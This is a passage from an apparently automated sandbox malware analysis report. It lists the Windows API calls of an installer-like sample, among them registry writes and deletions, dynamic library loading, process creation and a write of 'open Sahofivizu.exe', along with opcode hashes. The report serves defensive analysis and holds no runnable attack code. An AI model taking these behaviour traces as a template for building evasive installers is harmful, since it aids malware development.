            • Opcode ID: fb9d5c419c19e2bdb6c378f6819b1ebc1dc21d5e7d0f0b4f2b85ce684f360012
            • Instruction ID: 3d98ddf4d84b742d5460afe4edfb6d9be597fa80bf04213b3bc288f28cb5f5da
            • Opcode Fuzzy Hash: fb9d5c419c19e2bdb6c378f6819b1ebc1dc21d5e7d0f0b4f2b85ce684f360012
            • Instruction Fuzzy Hash: 82014470A40209ABDB209F60DD09FAE3779BB04345F008039FA06A92D1D7B8AA558F99
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C
              • Part of subcall function 00404DAA: lstrlenA.KERNEL32(004297B8,00000000,0041DB88,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000,?), ref: 00404DE3
              • Part of subcall function 00404DAA: lstrlenA.KERNEL32(00402FB6,004297B8,00000000,0041DB88,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000), ref: 00404DF3
              • Part of subcall function 00404DAA: lstrcatA.KERNEL32(004297B8,00402FB6,00402FB6,004297B8,00000000,0041DB88,756F110C), ref: 00404E06
              • Part of subcall function 00404DAA: SetWindowTextA.USER32(004297B8,004297B8), ref: 00404E18
              • Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E3E
              • Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E58
              • Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E66
            • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
            • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401F9C
            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
            • String ID: B
            • API String ID: 2987980305-3806887055
            • Opcode ID: 6d46612d3a10ff1fde0679903579df7a40cee65c269d183f8d6d4642c898af7f
            • Instruction ID: bf94c0598684f4a2e8798aed6ecd64900ad0f6fcd097f114c8a1beddd358b100
            • Opcode Fuzzy Hash: 6d46612d3a10ff1fde0679903579df7a40cee65c269d183f8d6d4642c898af7f
            • Instruction Fuzzy Hash: 5121EE72D04216EBCF107FA5CE49A6E75B06F45358F20433BF511B62E1C77C4941A65E
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?), ref: 00402341
            • lstrlenA.KERNEL32(fd ,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
            • RegSetValueExA.ADVAPI32(?,?,?,?,fd ,00000000), ref: 0040239A
            • RegCloseKey.ADVAPI32(?), ref: 0040247D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: CloseCreateValuelstrlen
            • String ID: fd
            • API String ID: 1356686001-2313478379
            • Opcode ID: 81d27fc1e3ab509f11f0648c0d675ea1f801cb77e08bc1b8ef6c2a36b769e97e
            • Instruction ID: 74c2b7e5efa1a9b7d251dd878628ee018497e02546d33d1ea7114f4406d6c15c
            • Opcode Fuzzy Hash: 81d27fc1e3ab509f11f0648c0d675ea1f801cb77e08bc1b8ef6c2a36b769e97e
            • Instruction Fuzzy Hash: 721160B1E00209BFEB10AFA5DE89EAF767CFB40398F10453AF901B71D0D6B85D019669
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
            • RegCloseKey.ADVAPI32(?), ref: 00402A9C
            • RegCloseKey.ADVAPI32(?), ref: 00402AC1
            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Close$DeleteEnumOpen
            • String ID:
            • API String ID: 1912718029-0
            • Opcode ID: b26b43b9b7666f40e9fdb218fe96b22a79156d573bb7d5cc257a1d138f5a7564
            • Instruction ID: 324dab2b24170647655e9dcbeda369d8ff673eed47d89bab0de13a8960c84090
            • Opcode Fuzzy Hash: b26b43b9b7666f40e9fdb218fe96b22a79156d573bb7d5cc257a1d138f5a7564
            • Instruction Fuzzy Hash: 4F115675A00008FFEF31AF91DE49DAB7B6DEB40384B104436FA05B10A0DBB59E51AE69
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
            • String ID:
            • API String ID: 1849352358-0
            • Opcode ID: 945e42f754af583b5ec13e30839ce2662c59fcb97218ebcfb2175b3756829da0
            • Instruction ID: f89edaf4e673e5a696cf4c500be88082f9c29b5fdabb6c66a10e118bddb835aa
            • Opcode Fuzzy Hash: 945e42f754af583b5ec13e30839ce2662c59fcb97218ebcfb2175b3756829da0
            • Instruction Fuzzy Hash: 71F01DB2E04105BFD700EBA4EE89DAFB7BDEB44345B104576F602F6190C678AD018B69
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlenA.KERNEL32(00429FE0,00429FE0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004044B7,000000DF,0000040F,00000400,00000000), ref: 00404625
            • wsprintfA.USER32 ref: 0040462D
            • SetDlgItemTextA.USER32(?,00429FE0), ref: 00404640
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: ItemTextlstrlenwsprintf
            • String ID: %u.%u%s%s
            • API String ID: 3540041739-3551169577
            • Opcode ID: 308c210494ba65c8d6c58fead7846ea59173cd15c70e93c8128561061e7c40a4
            • Instruction ID: a73c68329ee831a229c644748369bffc84c82a565a353c3d841dc2820e0c3950
            • Opcode Fuzzy Hash: 308c210494ba65c8d6c58fead7846ea59173cd15c70e93c8128561061e7c40a4
            • Instruction Fuzzy Hash: 9911D0737001243BDB10A66D9C46EEF329ADBC6334F14023BFA25F61D1E9388C5286E8
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
            • SendMessageA.USER32 ref: 00401C25
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: MessageSend$Timeout
            • String ID: !
            • API String ID: 1777923405-2657877971
            • Opcode ID: 5e77a80833e19dc55b8a20fadec5ab0659a97bc6c71de6bcb2193ca436d8299f
            • Instruction ID: e870f9960eb541ab862ab70d99fa676f0883abea00e9f1964bf1c40a5587cb5b
            • Opcode Fuzzy Hash: 5e77a80833e19dc55b8a20fadec5ab0659a97bc6c71de6bcb2193ca436d8299f
            • Instruction Fuzzy Hash: 3B21C4B1A44209BFEF01AFB4CE4AAAE7B75EF40344F14053EF602B60D1D6B84980E718
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042BFE8,Error launching installer), ref: 00405291
            • CloseHandle.KERNEL32(?), ref: 0040529E
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040526C
            • Error launching installer, xrefs: 0040527F
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: CloseCreateHandleProcess
            • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
            • API String ID: 3712363035-3894416041
            • Opcode ID: dc33ac1254d82063a7b9e43172f0f507123e59eb9c5a5fd92b1179a08dc1bdb0
            • Instruction ID: 9c205d3d1494e9e4afb0e3639077779a104ecf70f113e6d393e41fe649cd8d97
            • Opcode Fuzzy Hash: dc33ac1254d82063a7b9e43172f0f507123e59eb9c5a5fd92b1179a08dc1bdb0
            • Instruction Fuzzy Hash: FBE0ECB4A04209ABEB00EF64ED09D7B7BBCEB00304B408522A911E2290D778E410CEB9
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 00405505
            • CharPrevA.USER32(?,00000000), ref: 0040550E
            • lstrcatA.KERNEL32(?,00409010), ref: 0040551F
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 004054FF
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: CharPrevlstrcatlstrlen
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 2659869361-4017390910
            • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
            • Instruction ID: dfec000a3f5bf2671270dd29e8f8c50a5f72ee918dd093ba8f25731816a648b4
            • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
            • Instruction Fuzzy Hash: FCD0A972705A307ED2022A19AC06F8F2A88CF17301B044822F100B62D2C23C9E418FFE
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
            • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
            • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
              • Part of subcall function 0040596A: wsprintfA.USER32 ref: 00405977
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
            • String ID:
            • API String ID: 1404258612-0
            • Opcode ID: 099a0aa409c47306a0e5e8436e4e2e7c61bc24b53b401cebe12c2d8cce08dfb0
            • Instruction ID: ac83c8b0d38e5b491d5bd27050ffdb4091974a4b49ad9b19d675067d3fb65d11
            • Opcode Fuzzy Hash: 099a0aa409c47306a0e5e8436e4e2e7c61bc24b53b401cebe12c2d8cce08dfb0
            • Instruction Fuzzy Hash: 201148B2900108BFDB01EFA5D981DAEBBB9EF04344B24807AF505F61E1D7389A54DB28
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: CharNext
            • String ID: ES@
            • API String ID: 3213498283-1851447614
            • Opcode ID: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
            • Instruction ID: f60ec20427defc95a9886ae099bd540e39d30c8fbbaad3333d1940da6ed1a81e
            • Opcode Fuzzy Hash: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
            • Instruction Fuzzy Hash: F8F0A7A2D44B25B6E73222A84C44B6B6BADDB55711F244437E200B61D597B84C828FBA
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: CapsCreateDeviceFontIndirect
            • String ID:
            • API String ID: 3272661963-0
            • Opcode ID: bbbcfc34ac2d637fe9c3dcd2aae23fbeb0c3268bdde6826654245cc777324362
            • Instruction ID: 580b179190550232f88f4ba5e52f5296c98f8c4b0afe68c870f47754878f2485
            • Opcode Fuzzy Hash: bbbcfc34ac2d637fe9c3dcd2aae23fbeb0c3268bdde6826654245cc777324362
            • Instruction Fuzzy Hash: 68F044F1A45342AEE702A7B0AE4B7993B649725309F100436F545BA1E2C5BC00149B7F
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • DestroyWindow.USER32 ref: 00402BD1
            • GetTickCount.KERNEL32(00000000,00402D9E,00000001), ref: 00402BEF
            • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
            • ShowWindow.USER32(00000000,00000005), ref: 00402C1A
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Window$CountCreateDestroyDialogParamShowTick
            • String ID:
            • API String ID: 2102729457-0
            • Opcode ID: c87a5157f8204693ca179b822d2a85440fc20d6be017f85e77c31dbe1d2c93c5
            • Instruction ID: df45f881ccb5ca36463c1a09230da8cf23750fca8468dec1cd15007da7f5e5e8
            • Opcode Fuzzy Hash: c87a5157f8204693ca179b822d2a85440fc20d6be017f85e77c31dbe1d2c93c5
            • Instruction Fuzzy Hash: 22F0F430A09120EBC6716F95FD4C99B7F64E704B157504437F001B55F5D67878829B9D
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetWindowTextA.USER32(00000000,0042E360), ref: 004038B6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: TextWindow
            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
            • API String ID: 530164218-1176120985
            • Opcode ID: 48b09981901e30c4345b6e5c0cee300cf490ae76efe8ca9e2f713c31fa19992d
            • Instruction ID: f58d08b88b77c55e92e539ad5181c9965f6bbcffbd0d008a8b371c472e4a47a6
            • Opcode Fuzzy Hash: 48b09981901e30c4345b6e5c0cee300cf490ae76efe8ca9e2f713c31fa19992d
            • Instruction Fuzzy Hash: 9311D176B001009BC734EF56DC809737BADEB8471636881BFEC02A7390D639A8038A98
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • IsWindowVisible.USER32(?), ref: 00404D30
            • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404D9E
              • Part of subcall function 00403E0A: SendMessageA.USER32 ref: 00403E1C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Window$CallMessageProcSendVisible
            • String ID:
            • API String ID: 3748168415-3916222277
            • Opcode ID: 498d22ec92de87507460055f31d3341dd140a7d0c04a54d74523ea2b6bf50dd0
            • Instruction ID: b16bf2df46199d4e0f4b20eb531931f7d117dfa55111be6f57691eac5a9fa7e0
            • Opcode Fuzzy Hash: 498d22ec92de87507460055f31d3341dd140a7d0c04a54d74523ea2b6bf50dd0
            • Instruction Fuzzy Hash: 25114F71600218BBDB219F52DC41AAB3B69AF84365F00813FFA04B91E1C37D8D51CFA9
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
            • WriteFile.KERNEL32(00000000,?,open Sahofivizu.exe,00000000,?), ref: 004024FB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: FileWritelstrlen
            • String ID: open Sahofivizu.exe
